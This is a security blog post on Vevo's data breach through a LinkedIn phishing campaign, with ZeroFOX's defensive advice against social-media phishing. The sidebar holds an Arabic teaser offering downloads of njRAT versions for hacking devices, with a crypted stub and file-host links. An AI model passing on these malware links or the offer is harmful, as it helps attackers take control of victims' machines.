Vevo Hacked Via LinkedIn Phishing Campaign, Over 3TB of Sensitive Data Exposed

On September 15th, streaming service Vevo disclosed a massive data breach, to the tune of 3.12TB of sensitive internal data. The breach occurred after one of its employees was compromised via a LinkedIn phishing campaign, demonstrating again that social media is an incredibly effective vector for launching targeted attacks. Already this summer, attackers have successfully used similarly fake social accounts to persuade employees at oil and gas companies, a cybersecurity firm, and a government department to open malicious attachments designed to take control of victims’ devices.
Why are phishing attacks so effective when waged over social media? Social allows users to create believable online identities and interactions, which can help users build credibility and trust with their real-world peers. For the most part, these fields are publicly-facing, and serve as one of the first things validated upon receipt of a friend request or incoming message. Are they in the same profession? Do I share a common experience or connection? Attackers maximize opportunities for engagement by impersonating legitimate users or by fine-tuning profile fields and interactions to lure targets. Once socially engineered, a target’s trust can be leveraged to extract personal information or deliver malicious payloads.
Many social networks further encourage users to disclose sensitive information about their job roles, responsibilities, family, hobbies and more, all in the spirit of engaging with friends, networking with their colleagues and staying in touch with family. However, this information is dangerous in the wrong hands. An attacker may learn which employees have access to critical systems or who has financial signing authority based on role descriptions, enabling them to craft a more precise attack. Similarly, if a network engineer posts that they are certified for a certain type of firewall, that can give attackers the information needed to determine that there is a high probability that their target organization uses said product.
Personal information can also be readily weaponized by an attacker during a social engineering campaign. The more information an attacker can glean about the victim’s family, hobbies, home address and personal connections, the better they can craft a unique spearphishing message. To boot, once the attacker has lifted the relevant information from the targets social media accounts during the reconnaissance phase, they can then launch the attack from directly within the social network by posting the payload to the user’s profile or sending it via direct message. It’s likely the Vevo attackers followed this exact attack workflow when distributing their attacks.
To minimize exposure to LinkedIn phishing and other targeted social media attacks, ZeroFOX recommends that users:
  • Limit interactions to users you’re sure you can trust. Make sure that you’ve either met them in person or that you have mutual connections and their profile seems credible. Don’t interact with profiles if they don’t know you or are contacting you for suspicious reasons.
  • Avoid clicking on links or downloading file attachments sent to you through social media, especially if the links seem suspicious or if the users seem unfamiliar. On LinkedIn it’s common to share attachments like cover letters, resumes and letters of recommendation. When in doubt, pass the link or attachment in question to an open source malware detector.
  • Ensure two-factor authentication is enabled on all of your social accounts. This provides another barrier of protection should an attacker ever steal your credentials. Many social networks can now require a code be sent to your phone or via email when they detect a new browser or device attempting to access your account, so be on the lookout for any sort of suspicious activity.
  • Security professionals should train employees, especially those with high-access privileges or important organizational roles, on what information should or should not be posted or be visible to the public. Security teams can distribute guidance on how to make elements of an employee’s social accounts private, meaning only followers or friends can see certain data fields like date of birth, connections or home address.
www.zerofox.com/blog

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining, at
Read more

Which phishing messages have a near 100% click rate?

Image
Training employees to spot phishing emails, messages and phone calls can’t be done just once or once a year if the organization wants to see click rates decrease. For one thing, employees come and go (and change roles) with regularity. Secondly, threats change over time. Thirdly, knowledge and practices that aren’t regularly reinforced will be lost. And, finally, awareness isn’t the same as knowledge. “Just knowing a threat exists isn’t the same as knowing how to recognize and respond to a threat when it presents itself. In-depth education about phishing prevention is needed to create lasting behavior change,” Wombat Security researchers point out. The statistics included in the company’s latest annual State of the Phish report show the difference made by both the tools used to train end users to recognize and avoid phishing attacks and how often they are used. In the US, most organizations use computer-based online security awareness training and simulated
Read more